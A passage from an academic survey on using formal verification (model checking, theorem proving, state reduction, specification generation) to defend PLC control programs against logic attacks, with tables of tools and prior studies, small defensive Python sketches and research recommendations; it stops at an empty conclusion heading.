Combined with studies at T1, these studies could handle more temporal features, such as varied scan cycle lengths, and enabled input-dependent behavior modeling. With control flow based representations, nested logic and pointers could also be supported. However, without concrete execution of the programs, the drawbacks are obvious: (1) the input vectors were either random or had to be chosen manually, (2) the number of symbolic states limited the program sizes, and (3) the temporal information further increased resource consumption. Next, we discuss behavior modeling with runtime information.

5.1.3. T3: program runtime. With runtime information, existing research [19], [53], [65], [98], [99] modeled programs considering their interactions with the physical processes, the supervisor, and the operator tasks. This allowed more realistic modeling of timing-sensitive instructions, and domain-specific behavior modeling.

Automated frameworks [91], [99] were presented to model PLC behaviors with interrupt scheduling, function calls, and I/O traces. Zhou et al. [99] adopted an environment module for the inputs and outputs, an interruption module for time-based instructions, and a coordinator module to schedule these two modules with the main program. Wang et al. [91] automated a BIP (Behavior, Interaction, Priority) framework to formalize the scanning mode, the interrupt scheduler, and the function calls. Mesli et al. [72] presented a component-based modeling of the whole control-command chain, with each component described as timed automata.
To automate the modeling of domain-specific event behavior, VetPLC [98] generated timed event causality graphs (TECG) from the program and the runtime data traces. The TECG maintained temporal dependencies constrained by machine operations.

These studies removed the barrier to modeling event-driven and domain-specific behaviors. They could mitigate attacks that violate security and safety requirements via special sequences of valid logic.

5.1.4. Challenges.

Lack of plant modeling. Galvao et al. [36] have pointed out the importance of plant models in formal verification. However, existing studies focused on the formalization of PLC programs, rather than the I/O of the programs, which directly reflects the behavior of the physical processes (i.e. the plant). Under T3, a few studies considered program I/O during behavior modeling. However, they either consider I/O as a generic module working together with the other modules [91], [99], or informally use data mining on program I/O to extract program event sequences [98]. It remains challenging to formalize plant models for improving PLC program security.

Lack of modeling evaluation. The majority of the studies only adopted one modeling method to obtain a program representation. We understand that the representation must be compatible with the formal verification framework. However, there were no scientific comparisons between models from different studies, except some high-level descriptions. Within one model, only a few studies [20], [69], [98] evaluated the number of states in their representations. It is even more difficult to understand the performance of the model from the security perspective.

State explosion. The aforementioned studies have already adopted an efficient representation that transforms a program unit into a state automaton and formalizes the state transition between the current cycle and the next cycle. A less efficient model representation transforms each variable of a program into a state and formalizes the transitions between the states. Even though such a representation can benefit PLC programs in any language, it produces large models containing too many states to be verified, even for small and medium-sized programs. Therefore, in practice, most of the programs are modeled in the former, more efficient representation. For large programs, however, both representations will produce large amounts of state combinations, causing the state explosion problem. The following describes research works on state reduction.

5.2. State Reduction

The goal of state reduction is to improve the scalability and complexity of PLC program formalization. There are two common steps involved. First, we have to determine the meaningful states related to safety and security properties. Then, we trim the less meaningful states.

5.2.1. T1: program source code. At the source code level, a line of studies [25], [29], [42], [79] performed state reduction. Gourcuff et al. [42] considered the meaningful states to be those related to the input and output variables, since they directly control the behavior of the physical processes. To obtain the dependency relations of the input and output variables, Gourcuff conducted static code analysis to get variable dependencies in a ST program, and found a large portion of unrelated states.
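The following is a minimal sketch of this kind of dependency-based reduction, assuming the program has already been flattened into per-variable read sets; the statements and variable names are hypothetical and not taken from [42]. Starting from the output variables, it keeps only the variables that can transitively influence them and discards the rest before model construction.

```python
def cone_of_influence(assignments, outputs):
    """assignments: mapping var -> set of vars read when computing it.
    Returns the set of variables that can (transitively) influence an output."""
    relevant = set(outputs)
    changed = True
    while changed:
        changed = False
        for var, reads in assignments.items():
            if var in relevant and not reads <= relevant:
                relevant |= reads
                changed = True
    return relevant

# Hypothetical ST-like program, flattened to variable dependencies:
#   motor := start AND NOT stop;   alarm := overtemp;   lamp := aux1 AND aux2;
deps = {
    "motor": {"start", "stop"},
    "alarm": {"overtemp"},
    "lamp":  {"aux1", "aux2"},
}
keep = cone_of_influence(deps, outputs={"motor", "alarm"})
drop = (set(deps) | {v for reads in deps.values() for v in reads}) - keep
print("model these:", sorted(keep))   # motor, alarm and the inputs they depend on
print("trim these:", sorted(drop))    # lamp, aux1, aux2 do not affect the checked outputs
```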
Even though this dependency-based method significantly reduced the state search space, it also skipped much of the original code in the subsequent verification. To improve the code coverage of the formalization, Pavlovic et al. [79] presented a general solution for FBD programs. They first transformed the graphical program into textual statements in textFBD, and further substituted the circuit variables to obtain tFBD. This approach removed the unnecessary assignments connecting continuous statements and merged them into one. On top of this approach, Darvas et al. fine-tuned the reduction heuristics with a more complete representation [25], [29]. Besides eliminating unnecessary variables or logic, these heuristics adopted cone of influence (COI)-based reduction and rule-based reduction. The COI-based reduction first removed unconditional states that all possible executions go through. It then removed variables that do not influence the evaluation of the specification. The rule-based reduction could be specified based on the safety requirements of the application domain. Additionally, mathematical models were also used to abstract different components. Newell et al. [76] defined additional structures, attribute maps, graphs, and block groups to reduce the state space of their PVS code.

These studies successfully reduced the size of the program state space. They were limited, however, to basic Boolean representation reduction. For programs with complex time-related variables, function blocks, or multitasking, these studies were insufficient. It was also unclear whether the reduction could undermine program security. The following discusses other reduction techniques when such information is present.

5.2.2. T2: program bytecode/binary. Studies at the binary level mostly adopted symbolic execution combined with a flow-based representation. This demonstrated that meaningful states lead to different symbolic output vectors. TSV [71] merged the input states that could all lead to the same output values. It also abstracted the temporal execution graphs, by removing the symbolic variables based on their product with the valuations of the LTL properties. To further reduce the unrelated states, Chang et al. [21] reduced the overlapping output states of the same scan cycle, and removed the output states that had been analyzed in previous cycles. To reduce the overhead of timer modeling, they employed a deduction method for the output states of timers, through analysis of the existing output state transition relationships. These reductions did not undermine the goal of detecting malicious behaviors spanning multiple cycles.

Compared with T1, these studies were more interested in preserving temporal features, and targeted the reduction of random inputs in symbolic execution. However, without undermining the temporal feature modeling, the reduction of input states was inefficient given the lack of real inputs. The following discusses the reduction techniques when runtime inputs are available.

5.2.3. T3: program runtime. With runtime information, we can gain a better understanding of the real meaningful states. These include the knowledge from event scheduling for subroutines and interrupts, and the real inputs and outputs from the domain-specific processes. Existing studies [53], [65], [98], [99] presented state reduction with different approaches. To reduce the scale of the model, Zhou et al. [99] modeled timers inline with the main program instead of as separate automata, since their model had already considered the real environment traces, the interruptions, and the scheduling between them.
Similarly, Wang et al. [91] compressed segments without jump and call instructions into one transition.

Besides merging unnecessary states, the real inputs and domain-specific knowledge can narrow down the range for modeling numerical and float variables. In Zhang's study [98], continuous timing behavior was discretized into multiple time slices with a constant interval. Since application-specific I/O traces were available, the time interval was narrowed to a range balancing efficiency and precision.

Compared with studies at T1 and T2, state reduction at T3 was more powerful: not only were more realistic temporal and event-driven features supported, it also helped to extract more meaningful states with domain-specific runtime information.

5.2.4. Challenges.

Lack of ground truth for continuous behavior. We discussed that runtime traces helped to determine a realistic granularity for continuous behaviors. However, choosing the granularity was still experience-based and ad hoc. In fact, a too coarse granularity would fail to detect actual attacks, while a too fine granularity expects infeasible attack scenarios [36]. Abstracting a ground truth model for continuous behavior remains challenging.

Implicitness and stealthy attacks from reduction. Although existing studies have considered property preservation, the reduced unrelated states may undermine PLC security. We mentioned in Section 4 that implicit specifications have led to attacks. The reduced states may cause an implicit mapping between the variables in the program and its specification, or they may contain stealthy behaviors that are simply omitted by the specification. The following discusses research on specification generation.

5.3. Specification Generation

The goal of these studies is to generate safety and security specifications with formal semantics. Specifying precise and complete desired properties is difficult. Existing studies focused on two aspects: (1) process-independent properties that describe the overall requirements for a control system, and (2) domain-specific properties that require domain expertise.

5.3.1. T1: program source code. At the source code level, a line of studies [13], [27], [28], [41], [47] investigated specification generation with process-independent properties. These properties include avoiding variable locks, avoiding unreachable operating modes, keeping operating modes mutually exclusive, and avoiding irrelevant logic [81].

Existing studies [4], [10], [16], [74], [81] usually adopted CTL or LTL-based formulas to express these properties. LTL describes the future of paths, e.g., a condition will eventually be true, or a condition will be true until another fact becomes true. CTL describes invariance and reachability, e.g., the system never leaves a set of states, or the system can reach a set of states, respectively. Other variants included ACTL, adopted by Rawlings [81], and ptLTL, adopted by Biallas [12].

Besides CTL and LTL-based formulas, proof assistants were also investigated to assist the development of formal proofs. To formally define the syntax and semantics, Biha et al. [13] used a type theory based proof assistant, Coq, to define the safety properties for IL programs. The semantics concentrated on the formalization of on-delay timers, using discrete time with a fixed interval.
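For reference, the behavior being formalized there, an IEC 61131-3 on-delay timer (TON), can be stated in discrete time as follows. This is a generic textbook rendering assuming a fixed scan interval Δ, not the Coq formalization used in [13].

```latex
% On-delay timer (TON) over scan cycles k = 0, 1, 2, ... with fixed interval \Delta:
% IN is the timer input, PT the preset time, ET the elapsed time, Q the output.
ET_k \;=\;
\begin{cases}
\min(ET_{k-1} + \Delta,\; PT) & \text{if } IN_k = 1,\\
0 & \text{if } IN_k = 0,
\end{cases}
\qquad
Q_k \;=\; \bigl(IN_k = 1 \;\wedge\; ET_k \geq PT\bigr).
```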
Besides Coq, the K framework [47] was also adopted to provide a formal operational semantics for ST programs. K is a rewriting-based semantic framework that has been applied to define the semantics of C and Java. Compared with Coq, K is less formal but lighter and easier to read and understand. The trade-off is that manual effort is required to ensure the formality of the definition.

These studies limited specification generation to certain program models. To enable formal semantics for state-based, data-flow-oriented, and time-dependent program models, Darvas et al. [27] presented PLCspecif to support the various models.

These studies provided opportunities for engineers lacking formalism expertise to generate formal and precise requirements. The proof assistant frameworks even allowed generating directly executable programs, e.g. C programs. Nevertheless, only process-independent properties could be automated; the following discusses specification generation with more information available.

5.3.2. T2: program bytecode/binary. As mentioned earlier, symbolic execution allowed these studies to support program modeling with numeric and float variables. These variables provided more room for property definitions in the specification. TSV [71] defined properties bounding the numerical device parameters, such as the maximum drive velocity and acceleration. Others [21], [93], [100] defined properties to detect malicious code injection and parameter tampering attacks. Xie et al. [93] expanded the properties to detect stealthy attacks and denial of service attacks.

Similar to studies at T1, these studies all adopted LTL-based formalisms, and could automate process-independent property generation. To accommodate certain attack strategies, the specification generation was manually defined.

5.3.3. T3: program runtime. With runtime information available, specification generation concentrated more on domain-specific properties. In a wastewater treatment plant setting, Luccarini et al. [65] applied artificial neural networks to extract qualitative patterns from the continuous signals of the water, such as the pH and the dissolved oxygen. These qualitative patterns were then mapped to the control events in the physical processes. The mapping was logged using XML and translated into formal rules for the specification. This approach considered the collected input and output traces as ground truth for security and safety properties, and removed the dependencies on domain expertise.

In reality, the runtime traces might be polluted, or contain incomplete properties for verification. To ensure the correctness and completeness of domain-specific rules, existing studies [36], [98] also considered semi-automated approaches, which combine automated data mining and manual domain expertise. VetPLC [98] formally defined the safety properties through automatic data mining and event extraction, aided by domain expertise in crafting safety specifications. VetPLC adopted timed propositional temporal logic (TPTL), which is more suitable for expressing safety specifications quantitatively.

Besides (semi-)automated specification generation, Mesli et al. [72] manually defined a set of rules for the interaction between each component along the chain of control. The requirements are also written in CTL temporal logic. To assist domain experts in developing formal rules, Wang et al. [91] formalized the semantics of a BIP model for all types of PLC programs. It automated process-independent rules for interrupts, such as following the first-come-first-serve principle.
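To make the contrast between the two property classes discussed in this section concrete, the formulas below give one process-independent property and one domain-specific timed property. The variable names (mode_auto, mode_manual, stop_cmd, valve_closed) and the five-second deadline are hypothetical, chosen only for illustration.

```latex
% Process-independent (CTL): the two operating modes are mutually exclusive,
% and the automatic mode stays reachable from every state.
\mathbf{AG}\,\neg(\mathit{mode\_auto} \wedge \mathit{mode\_manual})
\qquad
\mathbf{AG}\,\mathbf{EF}\,\mathit{mode\_auto}

% Domain-specific, timed (MTL-style): after a stop command, the valve must be
% closed within five seconds.
\mathbf{G}\,\bigl(\mathit{stop\_cmd} \rightarrow \mathbf{F}_{\le 5\,\mathrm{s}}\,\mathit{valve\_closed}\bigr)
```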
These studies enabled specification generation with domain-specific knowledge. They thus expanded security research with more concentration on safety requirements.

5.3.4. Challenges.

Lack of specification-refined programming. Since these studies already assumed the existence of the PLC programs (source code or binary), the generated specification could help refine the programming and program modeling. We mentioned earlier that state reduction considered property preservation and removed irrelevant logic from program modeling. However, the generated properties did not provide direct feedback to the program source code. In fact, program refinement, in a manner similar to state reduction, is promising for eliminating irrelevant stealthy code from the source.

Ad-hoc and unverified specification translations. Despite the availability of formal semantics and proof assistants, such as Coq, PVS, and HOL, existing requirements are informally defined in high-level languages and vary across industrial domains. Existing studies translating these requirements encountered many challenges: (1) the trade-off between an automated but unverified approach and a formal but manual rewriting, (2) the dependencies on the programming language (many studies were based on IL [47], deprecated in IEC 61131-3 since 2013), and (3) the rules were based on sample programs lacking the complexity of real industry.

Barrier to automated domain-specific property generation. Although Luccarini [65] presented a promising approach, it was based on two unrealistic assumptions: (1) the trace collected from the physical processes was complete and could be trusted, and (2) the learning algorithm extracted the rules completely and accurately. Without further proofs (manual domain expertise) to lift these two assumptions, the extracted properties would be an incomplete whitelist which may also contain implicitness, leading to false positives or false negatives in the verification or detection.

Specification generation with evolved system design. Increasing requirements are laid on PLC programs, considering the interactions with new components. In behavior modeling, we have observed studies formalizing the behaviors of new interactions on top of existing models, for example, adding a scheduler module combining an existing program with a new component. In comparison, we saw fewer studies investigating incremental specification generation based on existing properties. It is still challenging to define the properties needed to synchronize PLC programs with various components, especially in a timing-sensitive fashion.

5.4. Verification

We have already discussed the modeling of program behavior and specification generation. With these, a line of studies [9], [10], [16], [17], [20], [74], [75], [77], [80], [81], [96] applied model checking and theorem proving to verify the safety and security of the programs.

These studies applied several formal verification frameworks, summarized in Table 2. The majority of them used Uppaal and Cadence SMV. Uppaal was used for real-time verification, representing a network of timed automata extended with integer variables, structured data types, and channel synchronization. Cadence SMV was used for untimed verification.

5.4.1. T1: program source code. At the source code level, formal verification studies aimed at verifying weaknesses W1-W4, to defend against general safety problems.
They have been applied to programs from different industries. To defend G1, Bender et al. [10] adopted model checking for LD programs modeled as timed Petri nets. They applied model checkers in the Tina toolkit to verify LTL properties. Bauer et al. [9] adopted Cadence SMV and Uppaal to verify untimed and timed modeling of SFC programs, respectively. They identified errors in three reactors. Similarly, Niang et al. [77] verified a circuit breaker program in SFC using Uppaal, based on a recipe book specification. To defend G2, Hailesellasie et al. [44] applied Uppaal and compared two formally generated attributed graphs: the Golden Model with the properties, and a model formalized from a PLC program. The verification is based on the comparison of the nodes and edges of the graphs. They detected stealthy code injections.

Instead of adopting existing tools, several studies developed their own frameworks for verification. Arcade.PLC [12] supported model checking with CTL and LTL-based properties for all types of PLC programs. PLCverif [28] supported programs from all five Siemens PLC languages. NuDE 2.0 [56] provided formal-method-based software development, verification and safety analysis for nuclear industries. Rawlings et al. [81] applied the symbolic model checking tools st2smv and SynthSMV to verify and falsify a ST program controlling batch reactor systems. They automatically verified process-independent properties, rooted in W1-W4.

Besides model checking, existing studies [76] also adopted PVS theorem proving to verify the safety properties described in tabular expressions in a railway interlocking system.

These studies are limited to the verification of general safety requirements. To defend G2 and G3, more information is needed, as discussed in the following.

5.4.2. T2: program bytecode/binary. This line of studies [21], [71], [91], [93], [100] allows us to detect binary tampering attacks.

TSV [71] combined symbolic execution and model checking. It fed the model checker with an abstracted temporal execution graph, together with its manually crafted LTL-based safety property. Due to its support for random timer values within one cycle, TSV was limited in checking code with timer operations, and still suffered from state explosion problems. Xie et al. [93] mitigated this problem with the use of constraints in verifying random input signals. Xie used the nuXmv model checker. Chang et al. [21] applied a less formal verification based on the number of states.

These studies successfully detected malicious parameter tampering attacks, based on sample programs controlling traffic lights, an elevator, a water tank, a stirrer, and a sewage injector.

5.4.3. T3: program runtime. With runtime information, existing studies could verify domain-specific safety and security issues, namely all the weaknesses and security goals discussed in Section 4.

To defend G1 by considering the interactions with the program, Carlsson et al. [18] applied NuSMV to verify the interaction between the Open Platform Communications (OPC) interface and the program, using properties defined as server/client states. They detected synchronization problems, such as jitter, delay, race conditions, and slow sampling caused by the OPC interface.
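The kinds of synchronization problems reported in [18] can also be screened for offline with a very simple check over recorded sample timestamps. The sketch below is our own illustration, not the method of Carlsson et al.: it flags slow sampling and jitter against assumed bounds (the 100 ms nominal period and 20 ms tolerance are hypothetical).

```python
def check_sampling(timestamps, period, jitter_tol):
    """timestamps: sample times in seconds from a recorded OPC/HMI trace.
    Flags intervals that are far too long (slow sampling / lost samples) or
    that deviate from the nominal period by more than jitter_tol."""
    issues = []
    for i in range(1, len(timestamps)):
        dt = timestamps[i] - timestamps[i - 1]
        if dt > 2 * period:
            issues.append((i, dt, "slow sampling"))
        elif abs(dt - period) > jitter_tol:
            issues.append((i, dt, "jitter"))
    return issues

# Hypothetical trace: nominal 100 ms period, one overly long gap and one jittery sample.
trace = [0.000, 0.100, 0.201, 0.298, 0.520, 0.620, 0.755]
for idx, dt, kind in check_sampling(trace, period=0.100, jitter_tol=0.020):
    print(f"sample {idx}: interval {dt*1000:.0f} ms -> {kind}")
```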
Mesli [72] applied Uppaal to multi-layer timed automata, based on a set of safety and usability properties written in CTL. They detected synchronization errors between the control programs and the supervision interfaces.

To fully leverage the knowledge from the physical processes, VetPLC [98] combined runtime traces and applied BUILDTSEQS to verify security properties defined in timed propositional temporal logic. HyPLC [38] applied the theorem prover KeYmaera X to verify properties defined in differential dynamic logic. Different from VetPLC, HyPLC aimed at a bi-directional verification between the physical processes and the PLC program, to detect safety violations.

These studies either assumed an offline verification, or vaguely mentioned using a supervisory component for online verification. To provide an online verification framework, Garcia et al. [40] presented an on-device runtime solution to detect control logic corruption. They leveraged an embedded hypervisor within the PLC, with more computational power and integration of direct library function calls. The hypervisor overcame the difficulties of strict timing requirements and limited resources, and allowed verification to be enforced within each scan cycle.

5.4.4. Challenges.

Lack of benchmarks for formal verification. Similar to the challenges in behavior modeling, an ideal evaluation should be multi-dimensional: across modeling methods, across verification methods, and based on a set of benchmark programs. Existing evaluations, if performed at all, were limited to one dimension and based on at most a few sample programs. These programs were often vendor-specific, test-case driven, and failed to reflect real industrial complexity. Without a representative benchmark and concrete evaluation, security solution design will remain ad hoc.

Open-source automated verification frameworks. Existing studies have presented several open-source frameworks that take a PLC program as input and automatically generate the formal verification result over generic properties. These frameworks (e.g. Arcade.PLC, st2smv and SynthSMV) lowered the bar for security analysis using formal verification. However, over the years, such frameworks were no longer supported. No comparable replacement emerged, except PLCverif [26], which targets Siemens programs.

High demand for runtime verification. The challenges include (1) expanded attack landscapes due to increasingly complex networking, (2) the trade-off between the limited resources available on the PLC and real-time constraints, (3) stealthy attacks injected at runtime due to insecure communication, and (4) runtime denial of service attacks omitted by existing studies.

6. Recommendations

We have described and discussed the security challenges in defending against PLC program attacks using formal verification and analysis. Next, we offer recommendations to overcome these challenges. Our recommendations highlight promising research paths based on a thorough analysis of the state of the art and the current challenges. We consider these recommendations equally relevant regardless of any particular factor, not mentioned or considered in this section, that may change this perception.

6.1. Program Modeling

6.1.1. Plant Modeling. We discussed the lack of formalized plant modeling in Section 5.1.4. We recommend more research in plant modeling to formalize more accurate and complete program behaviors. Future research should consider refinement techniques to define the granularity and level of abstraction for the plant models and the properties to verify. The refinement techniques should consider the avoidance of state explosion, by extracting feasible conditions of the plant that can trigger property violations in the program.
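As a deliberately coarse sketch of what plant-model-based checking can look like in practice (our own illustration under simplifying assumptions we introduce here: a single tank, constant inflow/outflow rates, and a fixed tolerance; it is not a method from the cited studies), the code below steps a one-tank model alongside logged PLC pump commands and compares the prediction with the logged level readings; a persistent mismatch suggests manipulated inputs or outputs.

```python
def step_tank(level, pump_on, dt=1.0, inflow=2.0, outflow=0.5, capacity=100.0):
    """Coarse plant model (assumed dynamics): the pump adds `inflow` units per
    second, a fixed drain removes `outflow`, and the level stays in the tank."""
    rate = (inflow if pump_on else 0.0) - outflow
    return min(max(level + rate * dt, 0.0), capacity)

def check_trace(level0, pump_cmds, reported_levels, tolerance=3.0):
    """Replay logged pump commands through the plant model and compare the
    prediction with the logged level sensor values."""
    level, alerts = level0, []
    for k, (pump_on, reported) in enumerate(zip(pump_cmds, reported_levels)):
        level = step_tank(level, pump_on)
        if abs(level - reported) > tolerance:
            alerts.append((k, level, reported))
    return alerts

# Hypothetical log: the last two sensor readings are frozen at 20.0, which no
# longer matches what the commanded pump activity should produce.
cmds     = [True, True, True, True, True, True]
readings = [21.5, 23.0, 24.5, 26.0, 20.0, 20.0]
print(check_trace(level0=20.0, pump_cmds=cmds, reported_levels=readings))
```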
6.1.2. Input manipulation verification. Plant modeling is also promising for mitigating program input manipulation attacks. As mentioned in Section 4, input manipulation is widely adopted by attackers. Future research should consider the Orpheus [23] prototype in a PLC setting. Orpheus performs event consistency checking between the program model and the plant model to detect input manipulation attacks. To perform event consistency checking in a PLC, future research may consider instrumentation of the input and output variables of the programs, and compare their values with those from the plant models.

6.2. State Reduction

In Section 4.1.1, we discussed code level attacks that can disguise themselves as bad coding practice and are hard to notice. During state reduction, based on an existing specification, unrelated states are trimmed to avoid state explosion problems. However, as mentioned in Section 4.2, existing studies failed to investigate the relationship between the unrelated states and the original program. There could be hidden jumps with a stealthy logger that leaks critical program information. The specification might only consider the noticeable unsafe behaviors, which can disturb the physical processes, while letting the states from the stealthy code be recognized as unrelated. We therefore recommend future research to investigate the security validation of unrelated code, and to consider automatic program cleaning for the stealthy code.
TABLE 2: Common frameworks for formal verification

Framework | Modeling Language | Property Language/Prover | Supported Verification Techniques
NuSMV/nuXmv | SMV input language (BDD) | CTL, LTL | SMT, model checking, fairness requirements
Uppaal | Timed automata with clock and data variables | TCTL subset | Time-related and probability-related properties
Cadence SMV | SMV input language (BDD) | CTL, LTL | Temporal logic properties of finite state systems
SPIN | Promela | LTL | Model checking
UMC | UML | UCTL | Functional properties of service-oriented systems
Coq | Gallina (Calculus of Inductive Constructions) | Vernacular | Theorem proof assistant
PVS | PVS language (typed higher-order logic) | Primitive inference | Formal specification, verification and theorem prover
Z3 | SMT-LIB2 | SMT-LIB2 theories | Theorem prover

TABLE 3: Existing studies using formal verification to detect control logic attacks

Paper | Security Goal | Defense Focus | Verification Techniques | Property | PLC Language | Tools

T1 (source code):
Adiego 15 [4] | GI1 | BM, SG | MC | CTL, LTL | ST, SFC | nuXmv, PLCverif, Xtext, UNICOS
Bauer 04 [9] | GI1,GI3 | FV | MC | CTL | SFC | Cadence SMV, Uppaal
Bender 08 [10] | GI3 | SG, FV | MC | seLTL | LD | Tina Toolkit
Biallas 12 [12] | GI1,GI3 | SG, FV | MC | CTL, ptLTL | generic | PLCopen, Arcade.PLC*, CEGAR
Biha 11 [13] | GI1 | SG | TP | N/A | IL | SSReflect in Coq, CompCert
Brinksma 00 [16] | GI3 | SG | MC | N/A | SFC | SPIN/Promela, Uppaal
Darvas 14 [25] | GI1 | SR | MC | CTL, LTL | ST | COI reduction, NuSMV
Darvas 15 [27] | GI1,GI3 | SG | EC | N/A | ST | PLCspecif
Darvas 16-1 [28] | GI1 | SG, FV | N/A | temporal logic | ST | PLCverif, nuXmv, Uppaal
Darvas 16-2 [29] | GI1 | SR | MC, EC | temporal logic | LD, FBD | PLCverif, NuSMV, nuXmv, etc.
Darvas 17 [30] | GI1 | BM | N/A | temporal logic | IL | PLCverif, Xtext parser
Giese 06 [41] | GI1 | BM, SG | EC | N/A | ST | GROOVE, ISABELLE, FUJABA
Gourcuff 06 [42] | GI1,GI3 | SR | MC | N/A | ST, LD, IL | NuSMV
Hailesellasie 18 [44] | GI1,GC | FV | MC | N/A | SFC, ST, IL | BIP, nuXmv, Uppaal, UBIS model
Huang 19 [47] | GI1 | SG | N/A | N/A | ST | K framework, KST model
Kim 17 [56] | GI1,GI3 | FV | MC, EC | CTL | FBD, LD | CASE tools (NuDE 2.0), NuSCR
Moon 94 [74] | GI1 | SG | MC | CTL | LD | N/A
Newell 18 [76] | GI1,GI3 | BM, SR | TP | N/A | FBD | PVS theorem prover
Niang 17 [77] | GI3 | FV | MC | N/A | generic | Uppaal, program translators
Pavlovic 10 [79] | GI1,GI3 | SR | MC | CTL | FBD | NuSMV
Rawlings 18 [81] | GI1 | SG, FV | MC | CTL, ACTL | ST | st2smv, SynthSMV*
Mader 00 [66] | GI1 | BM | N/A | N/A | generic | N/A
Ovatman 16 [78] | GI1,GI3 | BM, FV | MC | N/A | generic | N/A
Moon 92 [75] | GI1,GI3 | ALL | MC | CTL | LD | aCTL model checker
Bohlender 18 [14] | GI1,GI3 | SR | MC | N/A | ST | Z3, PLCopen, Arcade.PLC
Kuzmin 13 [61] | GI1 | BM | N/A | LTL | ST | Cadence SMV
Bonfe 03 [15] | GI3 | BM | N/A | CTL | generic | SMV, CASE tools
Chadwick 18 [20] | GI3 | BM, SG | TP | FOL | LD | Swansea
Frey 00 [35] | GI1,GI3 | BM | N/A | N/A | N/A | N/A
Yoo 09 [96] | GI3 | ALL | MC, EC | CTL | FBD | NuSCR, Cadence SMV, VIS, CASE
Lamperiere 99 [62] | GI1 | BM | N/A | N/A | generic | N/A
Kottler 17 [59] | GI3 | ALL | N/A | CTL | LD | NuSMV
Younis 03 [97] | GI1,GI3 | BM | N/A | N/A | generic | N/A
Rossi 00 [82] | GI1 | BM | MC | CTL, LTL | LD | Cadence SMV
Vyatkin 99 [89] | GI1 | BM | MC | CTL | FBD | SESA model-analyser
Canet 00 [17] | GI1,GI3 | ALL | MC | LTL | IL | Cadence SMV

T2 (bytecode/binary):
Chang 18 [21] | GI1 | ALL | MC | LTL, CTL | IL | DotNetSiemensPLCToolBoxLibrary
McLaughlin 14 [71] | GI1,GI3 | ALL | MC | LTL | IL | TSV, Z3, NuSMV
Xie 20 [93] | GI1,GC,GA | BM, SG, FV | MC | LTL | IL | SMT, nuXmv
Zonouz 14 [100] | GI1,GI3 | BM, SG, FV | MC | LTL | IL | Z3, NuSMV

T3 (runtime):
Carlsson 12 [18] | GI | FV | MC | CTL, LTL | N/A | NuSMV
Cengic 06 [19] | GI2 | BM | MC | CTL | FBD | Supremica
Galvao 18 [36] | GI3,GI4 | SG | MC | CTL | FBD | ViVe/SESA
Garcia 16 [40] | GI3 | FV | MC | DFA | LD, ST | N/A
Janicke 15 [53] | GI1,GI2 | BM, SR | MC | ITL | LD | Tempura
Luccarini 10 [65] | GI3,GI4 | BM, SR, SG | TP | CLIMB | N/A | SCIFF checker
Mesli 16 [72] | GI | BM, SG, FV | MC | TCTL | LD, FBD | Uppaal
Wang 13 [91] | GI1,GI2 | BM, SR, SG | MC | LTL, MTL | IL | BIP
Zhang 19 [98] | GI,GC | ALL | MC | TPTL | ST | BUILDTSEQS algorithm
Zhou 09 [99] | GI | BM, SR | MC | TCTL | IL | Uppaal
Wan 09 [90] | GI1,GI2 | BM, FV | TP | Gallina | LD | Coq, Vernacular
Garcia 19 [38] | GI | BM | TP | differential dL | ST | KeYmaera X
Mokadem 10 [73] | GI3 | BM | MC | TCTL | LD | Uppaal
Cheng 17 [23] | GI2,GC | BM | N/A | eFSA | N/A | LLVM DG
Ait 98 [5] | GI2 | SG | TP | FOL | N/A | Atelier B

Defense Focus: Behavior Modeling (BM), State Reduction (SR), Specification Generation (SG), and Formal Verification (FV). Verification techniques: model checking (MC), equivalence checking (EC), and theorem proving (TP). In tools: items in bold are self-developed, bold italics are open-source, and * marks tools no longer maintained.

6.3. Specification Generation

6.3.1. Domain-specific property definition. As mentioned in Section 5.3.4, there are barriers to the automatic generation of domain-specific properties, and manually defined properties can cause implicitness. We recommend future research to consider domain-specific properties as a hybrid program consisting of continuous plant models as well as discrete control algorithms. These properties can be formalized using differential dynamic logic and verified with a sound proof calculus. Existing research [38] has formalized the dynamic logic model of a water treatment testbed controlled by a ST program. That formalization aims to understand safety implications, and can only support one task with Boolean operations. Future research should explore the formalization of dynamic logic with the goal of security verification, and support arithmetic operations, multitask programs, and applications in other domains.

6.3.2. Incremental specification generation. We discussed attacks using expanded input surfaces or a full chain of vulnerabilities in Section 4.2. We also discussed the challenges posed by fast-evolving system design in Section 5.3.4. This leads us to consider incremental specification generation, covering a full chain of behaviors and updating in a dynamic spectrum. Incremental specification generation [5] has been designed for interactive systems. In the PLC chain of control, interactions should consider both the physical process changes and the inclusion of the engineering station. Modeled behaviors from these new interactions should be compatible with existing properties. To update in a dynamic spectrum, the behavior changes from each interactive component should support automatic generation and comparison. This requires automatic translations between the behavior models of each component. The closest study is HyPLC [38], which supported automatic translation between the PLC program and the physical plant model. However, incremental specification generation was not considered. We encourage future research to investigate this direction, and to seek interactive mutual refinement.

6.4. Verification

6.4.1. Real-time attack detection. As shown in Sections 5.4.3 and 5.4.4, there is a high demand for runtime verification beyond a high-level prototype. To perform runtime verification, existing studies depend on engineering stations. However, Section 4.1.3 has demonstrated runtime attacks aiming at evading or deceiving the engineering station to escape runtime detection. The engineering stations have been exposed to various vulnerabilities [1], [50], [51], due to the rich features supported outside the scope of security. Therefore, we recommend future research to consider a dedicated security component, such as the bump-in-the-wire solution provided by TSV [71].
This component is promising for eliminating the resource constraints within a PLC, and allows the program to meet the strict cycle time. In addition to the real-time requirement, future research should also learn from existing attack studies [37], [54], and consider exploring the verification between the PLC and the other interacting components, including the engineering station.

6.4.2. Open-source tools and benchmarks. We discussed in Section 5.4.4 that the lack of open-source tools and benchmarks has led to ad hoc studies without evaluations of models and verification techniques. It is promising to see PLCverif [26] become open source and support the integration of various model checking tools. We recommend future studies to continue the development of open-source tools, covering program modeling, state reduction, specification generation, and formal verification. To adapt to broad use cases, we suggest that the tools be IEC 61131 compliant, compatible with existing open-source PLC tools [7], and maintained in the long term. We also recommend future studies to develop PLC security benchmarks, including a collection of open-source programs that are vendor-independent and can represent industrial complexities, and a set of security metrics that can support concrete evaluations.

6.4.3. Multitask Verification. In Section 4.1.3, we discussed attacks that can use PLC multitasking to perform denial-of-service attacks and spread stealthy worms. To defend against multitask attacks, existing studies [39], [73] only considered checking the reaction time between tasks to detect failures to meet the cycle time requirement. We recommend future research to consider more attack scenarios involving multitask programs, for example, using one task to spy on or spread malicious code to other co-located tasks, as done in PLCInject [58] and PLC-Blaster [85], or manipulating shared resources (e.g. global variables) between tasks to produce non-deterministic output that disturbs the physical processes. Future research should explore the verification of these attack scenarios, with consideration of task intervals and priorities at various granularities.

7. Conclusion

